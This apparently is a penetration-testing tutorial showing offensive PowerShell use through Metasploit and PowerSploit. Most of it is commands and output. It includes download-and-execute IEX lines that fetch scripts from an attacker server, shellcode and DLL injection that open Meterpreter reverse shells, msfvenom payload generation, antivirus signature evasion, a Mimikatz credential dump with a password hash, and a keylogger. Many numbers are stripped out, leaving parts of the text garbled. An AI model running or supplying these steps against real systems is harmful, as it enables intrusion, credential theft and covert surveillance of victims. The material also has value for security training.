PowerShell is so powerful
What is PowerShell?
PowerShell is an automation platform and scripting language for Windows and Windows Server that allows you to simplify the management of your systems. Unlike other text-based shells, PowerShell harnesses the power of the .NET Framework, providing rich objects and a massive set of built-in functionality for taking control of your Windows environments.
msf post(exec_powershell) > use post/windows/manage/payload_inject
msf post(payload_inject) > set PAYLOAD windows/powershell_reverse_tcp
PAYLOAD => windows/powershell_reverse_tcp
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT no Select the amount of shells you want to spawn.
HANDLER false no Start an exploit/multi/handler to receive the connection
LHOST yes IP of host that will receive the connection from the payload.
LPORT no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/powershell_reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION yes The session to run this module on.
msf post(payload_inject) > set LHOST
LHOST =>
msf post(payload_inject) > set SESSION
SESSION =>
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > run
[*] Running module against LAB
[*] Starting exploit/multi/handler
[*] Performing Architecture Check
[*] Started reverse SSL handler on :
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Interactive Powershell Session, Reverse TCP into process ID
[*] Opening process
[*] Starting the payload handler...
[*] Generating payload
[*] Allocating memory in procees
[*] Allocated memory at address , for byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process:
[*] Post module execution completed
msf post(payload_inject) > [*] Powershell session session opened (: -> :) at -- :: -
msf post(payload_inject) > sess
[*] Starting interaction with ..
Windows PowerShell running as user test on LAB
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\test>Get-Command -Name get-*
CommandType Name ModuleName
----------- ---- ----------
Function Get-DscConfiguration PSDesiredStateConfiguration
Function Get-DscLocalConfigurationManager PSDesiredStateConfiguration
Function Get-DscResource PSDesiredStateConfiguration
Function Get-FileHash Microsoft.PowerShell.Utility
Function Get-IseSnippet ISE
Function Get-LogProperties PSDiagnostics
Function Get-Verb
Function Get-Webclient
Cmdlet Get-Acl Microsoft.PowerShell.Security
Cmdlet Get-Alias Microsoft.PowerShell.Utility
Cmdlet Get-AppLockerFileInformation AppLocker
Cmdlet Get-AppLockerPolicy AppLocker
Cmdlet Get-AuthenticodeSignature Microsoft.PowerShell.Security
Cmdlet Get-BitsTransfer BitsTransfer
Cmdlet Get-ChildItem Microsoft.PowerShell.Management
Cmdlet Get-ChildPrimitive TShell
Cmdlet Get-CimAssociatedInstance CimCmdlets
Cmdlet Get-CimClass CimCmdlets
Cmdlet Get-CimInstance CimCmdlets
Cmdlet Get-CimSession CimCmdlets
Cmdlet Get-Command Microsoft.PowerShell.Core
Cmdlet Get-ComputerRestorePoint Microsoft.PowerShell.Management
Cmdlet Get-Content Microsoft.PowerShell.Management
Cmdlet Get-ControlPanelItem Microsoft.PowerShell.Management
Cmdlet Get-Counter Microsoft.PowerShell.Diagnostics
Cmdlet Get-Credential Microsoft.PowerShell.Security
Cmdlet Get-Culture Microsoft.PowerShell.Utility
Cmdlet Get-Date Microsoft.PowerShell.Utility
Cmdlet Get-Device TShell
Cmdlet Get-Event Microsoft.PowerShell.Utility
Cmdlet Get-EventLog Microsoft.PowerShell.Management
Cmdlet Get-EventSubscriber Microsoft.PowerShell.Utility
Cmdlet Get-ExecutionPolicy Microsoft.PowerShell.Security
Cmdlet Get-FormatData Microsoft.PowerShell.Utility
Cmdlet Get-Help Microsoft.PowerShell.Core
Cmdlet Get-History Microsoft.PowerShell.Core
Cmdlet Get-Host Microsoft.PowerShell.Utility
Cmdlet Get-HotFix Microsoft.PowerShell.Management
Cmdlet Get-Item Microsoft.PowerShell.Management
Cmdlet Get-ItemProperty Microsoft.PowerShell.Management
Cmdlet Get-Job Microsoft.PowerShell.Core
Cmdlet Get-JobTrigger PSScheduledJob
Cmdlet Get-Location Microsoft.PowerShell.Management
Cmdlet Get-Member Microsoft.PowerShell.Utility
Cmdlet Get-Module Microsoft.PowerShell.Core
Cmdlet Get-PfxCertificate Microsoft.PowerShell.Security
Cmdlet Get-Process Microsoft.PowerShell.Management
Cmdlet Get-PSBreakpoint Microsoft.PowerShell.Utility
Cmdlet Get-PSCallStack Microsoft.PowerShell.Utility
Cmdlet Get-PSDrive Microsoft.PowerShell.Management
Cmdlet Get-PSProvider Microsoft.PowerShell.Management
Cmdlet Get-PSSession Microsoft.PowerShell.Core
Cmdlet Get-PSSessionConfiguration Microsoft.PowerShell.Core
Cmdlet Get-PSSnapin Microsoft.PowerShell.Core
Cmdlet Get-Random Microsoft.PowerShell.Utility
Cmdlet Get-ResultSummary TShell
Cmdlet Get-ScheduledJob PSScheduledJob
Cmdlet Get-ScheduledJobOption PSScheduledJob
Cmdlet Get-Service Microsoft.PowerShell.Management
Cmdlet Get-SuiteName TShell
Cmdlet Get-TaskOutputPath TShell
Cmdlet Get-TraceSource Microsoft.PowerShell.Utility
Cmdlet Get-Transaction Microsoft.PowerShell.Management
Cmdlet Get-TroubleshootingPack TroubleshootingPack
Cmdlet Get-TypeData Microsoft.PowerShell.Utility
Cmdlet Get-UICulture Microsoft.PowerShell.Utility
Cmdlet Get-Unique Microsoft.PowerShell.Utility
Cmdlet Get-Variable Microsoft.PowerShell.Utility
Cmdlet Get-WinEvent Microsoft.PowerShell.Diagnostics
Cmdlet Get-WmiObject Microsoft.PowerShell.Management
Cmdlet Get-WSManCredSSP Microsoft.WSMan.Management
Cmdlet Get-WSManInstance Microsoft.WSMan.Management
PS C:\Users\test>
PowerSploit
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test.
If you have GIT, then you can simply run the following command to get all files from the github repository:
┌─[]─[/opt]
└──╼ sudo git clone https://github.com/PowerShellMafia/PowerSploit
[sudo] password for lab:
Cloning into 'PowerSploit'...
remote: Counting objects: , done.
remote: Total (delta ), reused (delta ), pack-reused
Receiving objects: % (/), MiB | KiB/s, done.
Resolving deltas: % (/), done.
Checking connectivity... done.
To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions.
Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it.
For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:
┌─[(master)]─[/opt/PowerSploit]
└──╼ python2 -m SimpleHTTPServer
Serving HTTP on port ...
- - [/Nov/ ::] "GET / HTTP/1.1" -
- - [/Nov/ ::] code , message File not found
- - [/Nov/ ::] "GET /favicon.ico HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/ HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/Invoke--Shellcode.ps1 HTTP/1.1" -
- - [/Nov/ ::] "GET /CodeExecution/Usage.md HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Persistence/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Recon/Invoke-Portscan.ps1 HTTP/1.1" -
- - [/Nov/ ::] "GET /Exfiltration/ HTTP/1.1" -
- - [/Nov/ ::] "GET /Exfiltration/Invoke-Mimikatz.ps1 HTTP/1.1" -
PowerSploit has categorized all the scripts in a pretty clear and organized manner:
Name | Description |
---|---|
Antivirus Bypass | Find bytes of a file which has a matching signature in antivirus. |
Code Execution | Used to execute code on victim machine. |
Exfiltration | Manipulate and collect information & data from victim machine(s). |
Persistence | Maintain control to machine by adding persistence to scripts. |
PE Tools | Handy PowerShell cmdlets for enumeration. |
Recon | Perform reconnaissance tasks using victim machine. |
Reverse Engineering | Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal. |
Script Modification | Create and manipulate scripts on victim machine. |
In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).
Install and run a PowerShell script
IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")
This command when run in PowerShell will install that PowerShell for the current process of PowerShell only.
Invoke-Shellcode
This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk.
We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using:
Run the above command in a PowerShell window to install “Invoke-Shellcode” script.
To get some information about the module type:
PS C:\Users\test> Get-Help -Parameter * Invoke-Shellcode
-ProcessID <UInt16>
Process ID of the process you want to inject shellcode into.
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Shellcode <Byte[]>
Specifies an optional shellcode passed in as a byte array
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Force [<SwitchParameter>]
Injects shellcode without prompting for confirmation. By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
Required? false
Position? named
Default value False
Accept pipeline input? false
Accept wildcard characters? false
-WhatIf [<SwitchParameter>]
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
-Confirm [<SwitchParameter>]
Required? false
Position? named
Default value
Accept pipeline input? false
Accept wildcard characters? false
Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:
Invoke-Shellcode -Force -Shellcode @(,..,)
Also we had setup a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell.
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The local listener hostname
LPORT yes The local listener port
Exploit target:
Id Name
-- ----
Wildcard Target
msf exploit(handler) > set LHOST
LHOST =>
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: d6c2d746722c5b0a/x86=/windows=/--T13::Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter > sysinfo
Computer : REMOTING
OS : Windows (Build , Service Pack ).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users :
Meterpreter : x86/win32
Please note that at the time of writing this article, only two Metasploit payloads are supported:
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process.
Note, you shouldn’t see any errors. Also note that if you see the following text:
Something terrible may have just happened and you have no idea what because you just arbitrarily download crap from the Internet and execute it.
you need to download
Invoke--Shellcode
instead of Invoke-Shellcode. It seems the author is trying to make a point about downloading code.
Inject in an existing process:
Get Process ID (PID) of a process using “Get-Process”.
PS C:\> Get-Process
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
342 9 2344 5580 111 0.75 448 csrss
309 16 6652 14500 119 19.56 488 csrss
75 6 1756 4908 61 0.06 768 dwm
682 34 35540 42864 213 8.17 1572 explorer
0 0 0 24 0 0 Idle
797 22 5664 14256 66 3.92 584 lsass
166 7 2680 4804 30 0.02 592 lsm
166 15 3744 8252 80 0.17 996 msdtc
155 11 7556 15832 90 0.86 3560 notepad
187 17 23884 30316 210 0.42 1360 opera
859 39 34120 68456 282 18.16 1688 opera
209 19 19772 33076 209 1.89 1740 opera
201 19 36528 53156 235 1.22 1804 opera
212 24 41836 58452 246 3.75 2576 opera
95 7 1788 5468 67 0.03 2772 opera_crashreporter
3346 62 235960 243028 636 22.58 1284 powershell
194 13 65852 60388 564 0.42 1844 powershell
221 10 2612 5928 32 4.47 572 services
77 5 7348 11828 39 6.83 984 SLsvc
28 2 404 904 6 0.02 384 smss
278 16 6960 10992 95 0.19 1220 spoolsv
389 27 8936 14920 81 0.55 224 svchost
249 17 8656 10764 78 0.23 396 svchost
525 29 16788 20936 106 6.66 416 svchost
297 9 2612 6256 39 0.53 776 svchost
259 13 3492 6912 36 0.30 836 svchost
293 16 7800 10616 51 1.23 928 svchost
147 8 3652 7016 36 0.08 956 svchost
898 60 22232 31480 123 1.64 972 svchost
267 29 7448 12132 54 0.38 1060 svchost
123 9 2512 6024 38 0.03 1288 svchost
73 5 1264 3308 26 0.03 1304 svchost
44 3 960 2756 18 0.02 1432 svchost
227 12 3876 5660 53 0.05 2612 svchost
520 0 0 2764 6 4 System
133 9 2352 6668 53 0.03 1540 taskeng
244 14 3588 9104 87 0.09 1908 taskeng
51 6 1256 3432 45 0.05 3568 telnet
98 8 1576 4780 49 0.19 496 wininit
128 6 2004 5584 34 0.19 524 winlogon
185 28 46436 53176 565 0.47 2296 wsmprovhost
136 6 2916 5364 77 0.06 1620 wuauclt
Note that the “Id” field is the Process ID (PID) of the corresponding process name.
Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload.
PS C:\> Invoke-Shellcode -ProcessId -Payload windows/meterpreter/reverse_https -Lhost -Lport
Attempt to execute -bit shellcode from -bit Powershell. Note: This process takes about one
minute. Be patient! You will also see some artifacts of the script loading in the other process.
Do you want to launch the payload from x86 Powershell?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):
PS C:\>
After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: 0c503b02c3240bfa/x86=/windows=/--08T14::09Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter >
Inject in a new process:
Create a new hidden process and inject the payload into it:
PS C:\> Start-Process c:\windows\system32\cmd.exe -WindowStyle Hidden
PS C:\> Get-Process cmd
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
cmd
PS C:\> Invoke-Shellcode -ProcessId -Payload windows/meterpreter/reverse_https -Lhost -Lport
Attempt to execute -bit shellcode from -bit Powershell. Note: This process takes about one
minute. Be patient! You will also see some artifacts of the script loading in the other process.
Do you want to launch the payload from x86 Powershell?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
PS C:\>
And we got a Meterpreter shell on the attacking machine:
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://:/
[*] Starting the payload handler...
[*] : (UUID: e4c8c2587cfaed17/x86=/windows=/--08T14::14Z) Staging Native payload ...
[*] Meterpreter session opened (: -> :) at -- :: +
meterpreter >
Invoke-DllInjection
This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk.
We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/CodeExecution/Invoke-DllInjection.ps1")
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/CodeExecution/Invoke-DllInjection.ps1")
PS C:\> Get-Help Invoke-DllInjection
NAME
Invoke-DllInjection
SYNOPSIS
Injects a Dll into the process ID of your choosing.
PowerSploit Function: Invoke-DllInjection
Author: Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String> [<CommonParameters>]
DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
RELATED LINKS
http://www.exploit-monday.com
REMARKS
To see the examples, type: "get-help Invoke-DllInjection -examples".
For more information, type: "get-help Invoke-DllInjection -detailed".
For technical information, type: "get-help Invoke-DllInjection -full".
Generate the Metasploit Meterpreter DLL and download it on the server:
┌─[(upstream-master)]─[/opt/metasploit-framework]
└──╼ ./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll > /opt/PowerSploit/msf.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: bytes
Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice.
Create a process in hidden mode and inject the DLL into it.
PS C:\Users\test\Desktop> Get-Process -Name notepad
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
60 3 1008 2032 56 0.00 352 notepad
57 3 976 4192 55 0.00 1568 notepad
PS C:\Users\test\Desktop> Invoke-DllInjection -ProcessID 1568 -Dll .\msf.dll
Size(K) ModuleName FileName
------- ---------- --------
20 msf.dll C:\Users\test\Desktop\msf.dll
PS C:\Users\test\Desktop> Get-Process -Module -Id 1568
Size(K) ModuleName FileName
------- ---------- --------
192 notepad.exe C:\Windows\system32\notepad.exe
1288 ntdll.dll C:\Windows\SYSTEM32\ntdll.dll
852 kernel32.dll C:\Windows\system32\kernel32.dll
300 KERNELBASE.dll C:\Windows\system32\KERNELBASE.dll
644 ADVAPI32.dll C:\Windows\system32\ADVAPI32.dll
688 msvcrt.dll C:\Windows\system32\msvcrt.dll
100 sechost.dll C:\Windows\SYSTEM32\sechost.dll
648 RPCRT4.dll C:\Windows\system32\RPCRT4.dll
312 GDI32.dll C:\Windows\system32\GDI32.dll
804 USER32.dll C:\Windows\system32\USER32.dll
40 LPK.dll C:\Windows\system32\LPK.dll
628 USP10.dll C:\Windows\system32\USP10.dll
492 COMDLG32.dll C:\Windows\system32\COMDLG32.dll
348 SHLWAPI.dll C:\Windows\system32\SHLWAPI.dll
1656 COMCTL32.dll C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\COMCTL32.dll
12592 SHELL32.dll C:\Windows\system32\SHELL32.dll
324 WINSPOOL.DRV C:\Windows\system32\WINSPOOL.DRV
1396 ole32.dll C:\Windows\system32\ole32.dll
580 OLEAUT32.dll C:\Windows\system32\OLEAUT32.dll
36 VERSION.dll C:\Windows\system32\VERSION.dll
124 IMM32.DLL C:\Windows\system32\IMM32.DLL
816 MSCTF.dll C:\Windows\system32\MSCTF.dll
48 CRYPTBASE.dll C:\Windows\system32\CRYPTBASE.dll
256 uxtheme.dll C:\Windows\system32\uxtheme.dll
76 dwmapi.dll C:\Windows\system32\dwmapi.dll
20 msf.dll C:\Users\test\Desktop\msf.dll
304 apphelp.dll C:\Windows\system32\apphelp.dll
Find-AVSignature
This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature.
We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/AntivirusBypass/Find-AVSignature.ps1")
PS C:\> Get-Help Find-AVSignature
NAME
Find-AVSignature
SYNOPSIS
Locate tiny AV signatures.
PowerSploit Function: Find-AVSignature
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Find-AVSignature [-StartByte] <UInt32> [-EndByte] <String> [-Interval] <UInt32> [[-Path] <String>] [[-OutPath] <Str
ing>] [[-BufferLen] <UInt32>] [-Force] [<CommonParameters>]
DESCRIPTION
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com.
RELATED LINKS
http://obscuresecurity.blogspot.com///finding-simple-av-signatures-with.html
https://github.com/mattifestation/PowerSploit
http://www.exploit-monday.com/
http://heapoverflow.com/f0rums/project.php?issueid=&filter=changes&page=
REMARKS
To see the examples, type: "get-help Find-AVSignature -examples".
For more information, type: "get-help Find-AVSignature -detailed".
For technical information, type: "get-help Find-AVSignature -full".
Running “Find-AVSignature” on a Meterpreter Windows executable:
Find-AVSignature -StartByte 0 -EndByte 6144 -Interval 50 -Path C:\test\exempt\nc.exe -OutPath c:\users\master\Desktop\msf.exe -OutPath c:\users\master\Desktop\run1 -Verbose
Invoke-Portscan
This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all.
We can easily install the Recon PowerShell script “Invoke-Portscan” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Invoke-Portscan.ps1")
PS C:\> Get-Help Invoke-Portscan
NAME
Invoke-Portscan
SYNOPSIS
Simple portscan module
PowerSploit Function: Invoke-Portscan
Author: Rich Lundeen (http://webstersProdigy.net)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>] [-TopPorts <Strin
g>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>] [-Threads <Int32>] [-nHosts <
Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>] [-GrepOut <String>] [-XmlOut <Str
ing>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter] [-quiet] [-ForceOverwrite] [<CommonParam
eters>]
Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>] [-TopPorts <Stri
ng>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>] [-Threads <Int32>] [-nHosts
<Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>] [-GrepOut <String>] [-XmlOut <St
ring>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter] [-quiet] [-ForceOverwrite] [<CommonPara
meters>]
DESCRIPTION
Does a simple port scan using regular sockets, based (pretty) loosely on nmap
RELATED LINKS
http://webstersprodigy.net
REMARKS
To see the examples, type: "get-help Invoke-Portscan -examples".
For more information, type: "get-help Invoke-Portscan -detailed".
For technical information, type: "get-help Invoke-Portscan -full".
Run a port scan for a list of hosts and ports:
There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options.
It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively.
Invoke-ReverseDnsLookup
This cmdlet is used to find the DNS PTR record for corresponding IP address(es).
We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Invoke-ReverseDnsLookup.ps1")
PS C:\> Get-Help Invoke-ReverseDnsLookup
NAME
Invoke-ReverseDnsLookup
SYNOPSIS
Perform a reverse DNS lookup scan on a range of IP addresses.
PowerSploit Function: Invoke-ReverseDnsLookup
Author: Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Invoke-ReverseDnsLookup [-IpRange] <String> [<CommonParameters>]
DESCRIPTION
Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records. This script is useful for performing DNS rec
onnaisance prior to conducting an authorized penetration test.
RELATED LINKS
http://www.exploit-monday.com
https://github.com/mattifestation/PowerSploit
REMARKS
To see the examples, type: "get-help Invoke-ReverseDnsLookup -examples".
For more information, type: "get-help Invoke-ReverseDnsLookup -detailed".
For technical information, type: "get-help Invoke-ReverseDnsLookup -full".
Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch:
PS C:\> Invoke-ReverseDnsLookup -IpRange /
HostName IP
-------- --
google-public-dns-a.google.com
...
Get-HttpStatus
This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server.
We can easily install the Recon PowerShell script “Get-HttpStatus” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Recon/Get-HttpStatus.ps1")
PS C:\> Get-Help Get-HttpStatus
NAME
Get-HttpStatus
SYNOPSIS
Returns the HTTP Status Codes and full URL for specified paths.
PowerSploit Function: Get-HttpStatus
Author: Chris Campbell (@obscuresec)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
SYNTAX
Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL] [<CommonParameters>]
DESCRIPTION
A script to check for the existence of a path or file on a webserver.
RELATED LINKS
http://obscuresecurity.blogspot.com
http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
REMARKS
To see the examples, type: "get-help Get-HttpStatus -examples".
For more information, type: "get-help Get-HttpStatus -detailed".
For technical information, type: "get-help Get-HttpStatus -full".
Execute this cmdlet using the following command (the dictionary file is that of DirBuster):
PS C:\> Get-HttpStatus -Target search.yahoo.com -Path .\urls.txt
URL Status
--- ------
http://search.yahoo.com/index NotFound
http://search.yahoo.com/admin NotFound
http://search.yahoo.com/ NotFound
http://search.yahoo.com/main NotFound
http://search.yahoo.com/page NotFound
http://search.yahoo.com/images OK
If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:
PS C:\> Get-HttpStatus -Target www.yahoo.com -UseSSL -Path .\urls.txt
URL Status
--- ------
https://www.yahoo.com/index NotFound
https://www.yahoo.com/admin NotFound
https://www.yahoo.com/ NotFound
https://www.yahoo.com/main NotFound
https://www.yahoo.com/page NotFound
https://www.yahoo.com/images OK
If the service is running on some other port like 8080, 8000, etc, for defining a port use the “-Port” switch.
PS C:\> Get-HttpStatus -Target demo.com -Port -Path .\urls.txt
Invoke-Mimikatz
This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc from the local computer or other computers in the domain.
It is one of the most useful PowerSploit tools in a penetration testing engagement.
We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:
PS C:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.108:8080/Exfiltration/Invoke-Mimikatz.ps1")
PS C:\> Get-Help Invoke-Mimikatz
NAME
Invoke-Mimikatz
SYNOPSIS
This script leverages Mimikatz and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in mem
ory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows that has PowerShell
v2 or higher installed.
Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. Email: [email protected]. Twi
tter @gentilkiwi
License: http://creativecommons.org/licenses/by//fr/
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Version:
ReflectivePEInjection version:
Mimikatz version: alpha (//)
SYNTAX
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]
DESCRIPTION
Reflectively loads Mimikatz in memory using PowerShell. Can be used to dump credentials without writing anythin
g to disk. Can be used for any
functionality provided with Mimikatz.
RELATED LINKS
Blog: http://clymb3r.wordpress.com/
Benjamin DELPY blog: http://blog.gentilkiwi.com
Github repo: https://github.com/clymb3r/PowerShell
mimikatz Github repo: https://github.com/gentilkiwi/mimikatz
Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be
-loaded-using-invoke-reflectivedllinjection-ps1/
REMARKS
To see the examples, type: "get-help Invoke-Mimikatz -examples".
For more information, type: "get-help Invoke-Mimikatz -detailed".
For technical information, type: "get-help Invoke-Mimikatz -full".
Dump credentials using: Invoke-Mimikatz -DumpCreds
PS C:\> Invoke-Mimikatz -DumpCreds
.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : ; (:e)
Session : Interactive from
User Name : Administrator
Domain : REMOTING
SID : S-------
msv :
[] Primary
* Username : Administrator
* Domain : REMOTING
* LM : fdc5a70a13943d6273d1c29094e32430
.......
Get-Keystrokes
his cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystorkes are stored in a local file on default (temp directory) or custom location.
We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:
PS C:\Users\test\Desktop> Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
PS C:\Users\test\Desktop> Get-Help -Examples Get-Keystrokes
NAME
Get-Keystrokes
SYNOPSIS
Logs keys pressed, time and the active window.
PowerSploit Function: Get-Keystrokes
Author: Chris Campbell (@obscuresec) and Matthew Graeber (@mattifestation)
License: BSD -Clause
Required Dependencies: None
Optional Dependencies: None
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -LogPath C:\key.log
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -CollectionInterval
-------------------------- EXAMPLE --------------------------
C:\PS>Get-Keystrokes -PollingInterval
This cmdlet can be executed using the following command:
Get-Keystrokes -LogPath c:\users\Administrator\desktop\keylogger.txt
This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp.
